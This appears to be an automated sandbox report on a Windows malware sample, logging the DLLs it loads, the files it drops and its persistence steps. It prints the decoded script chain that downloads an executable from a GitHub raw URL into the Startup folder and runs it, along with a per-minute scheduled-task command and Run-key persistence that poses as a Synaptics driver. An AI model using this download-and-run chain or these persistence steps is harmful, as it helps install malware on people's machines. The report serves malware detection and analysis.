                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                                Source: BQQQVU.lnk.15.drLNK file: ..\..\..\..\..\Windata\XNLAGO.exe
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\WOG3KXC.iniJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior

                                Data Obfuscation

                                barindex
                                VBScript performs obfuscated calls to suspicious functions
                                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main", "false");IServerXMLHTTPRequest2.send();IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe", "2");IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe", "2");IWshShell3.Exec("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe")
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_00A2C140 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,22_2_00A2C140
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00128D99 push edi; retn 0000h15_2_00128D9B
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00128F0E push F7FFFFFFh; retn 0000h15_2_00128F13
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00147795 push ecx; ret 15_2_001477A8
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_00888D99 push edi; retn 0000h22_2_00888D9B
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_00888F0E push F7FFFFFFh; retn 0000h22_2_00888F13
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008A7795 push ecx; ret 22_2_008A77A8
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00128D99 push edi; retn 0000h31_2_00128D9B
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00128F0E push F7FFFFFFh; retn 0000h31_2_00128F13
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00147795 push ecx; ret 31_2_001477A8
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1

                                Persistence and Installation Behavior

                                barindex
                                Drops PE files to the document folder of the user
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\CZQKSDDMWR\~$cache1Jump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeFile created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\CZQKSDDMWR\~$cache1Jump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\ProgramData\Synaptics\RCXD42.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\ProgramData\Synaptics\RCXD42.tmpJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\CZQKSDDMWR\~$cache1Jump to dropped file

                                Boot Survival

                                barindex
                                Drops PE files to the startup folder
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJump to dropped file
                                Uses schtasks.exe or at.exe to add and modify task schedules
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BQQQVU.lnkJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQQQVUJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQQQVUJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0013F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,15_2_0013F78E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00187F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,15_2_00187F0E
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_0089F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,22_2_0089F78E
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008E7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,22_2_008E7F0E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0013F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,31_2_0013F78E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00187F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,31_2_00187F0E
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008A1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,22_2_008A1E5A
                                Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
